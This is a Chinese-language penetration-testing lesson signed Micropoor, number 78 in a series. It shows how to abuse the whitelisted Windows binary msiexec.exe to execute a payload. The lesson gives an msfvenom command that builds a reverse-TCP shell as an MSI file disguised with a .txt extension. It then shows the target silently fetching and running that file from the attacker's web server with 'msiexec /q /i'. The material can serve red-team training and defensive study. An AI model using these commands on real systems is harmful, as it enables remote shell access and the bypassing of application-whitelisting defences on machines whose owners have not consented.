# 第七十八课：基于白名单Msiexec执行payload第八季

**注：**&#x8BF7;多喝点热水或者凉白开，身体特别重要。

## Msiexec简介：

Msiexec 是 Windows Installer 的一部分。用于安装 Windows Installer 安装包（MSI）,一般在运行 Microsoft Update 安装更新或安装部分软件的时候出现，占用内存比较大。并且集成于 Windows 2003，Windows 7 等。

**说明：**&#x4D;siexec.exe所在路径已被系统添加PATH环境变量中，因此，Msiexec命令可识别。

## 基于白名单Msiexec.exe配置payload：

Windows 2003 默认位置：

```bash
C:\WINDOWS\system32\msiexec.exe
C:\WINDOWS\SysWOW64\msiexec.exe
```

**攻击机：**&#x31;92.168.1.4 Debian\
**靶机：** 192.168.1.119 Windows 2003

## 配置攻击机msf：

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXjML3_FcKKksF7yox%2F-LZPXVxWeBjSaPt87PYj%2F2649cf5ad568984ff20e46111fa98b12.jpg?generation=1551066073188525\&alt=media)

## 配置payload：

```bash
msfvenom ‐p windows/x64/shell/reverse_tcp LHOST=192.168.1.4 LPORT=53 ‐ f msi > Micropoor_rev_x64_53.txt
```

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXjML3_FcKKksF7yox%2F-LZPXVx_r7Y_-hjcGvD6%2F5c011fcb99c3411ae97fb78affcca15d.jpg?generation=1551066074848145\&alt=media)

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXjML3_FcKKksF7yox%2F-LZPXVxcMFv34TfFiMtQ%2F69b03297f582100971130f6ac6a9e1e4.jpg?generation=1551066078102651\&alt=media)

## 靶机执行：

```bash
C:\Windows\System32\msiexec.exe /q /i http://192.168.1.4/Micropoor_rev\_x64_53.txt
```

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXjML3_FcKKksF7yox%2F-LZPXVxfHu1F5AwAJhKr%2F39acc13b2f9da5473510eed6d26c74a1.jpg?generation=1551066050848418\&alt=media)

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXjML3_FcKKksF7yox%2F-LZPXVxjIe-8_PJH2i8N%2Fc70a2131fc4a5392c8405806438ca269.jpg?generation=1551066069574550\&alt=media)

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXjML3_FcKKksF7yox%2F-LZPXVxlf_6OI3SYZ20F%2F7f9e95b7d3fa9393cd1e6a4978294430.jpg?generation=1551066085304510\&alt=media)

> Micropoor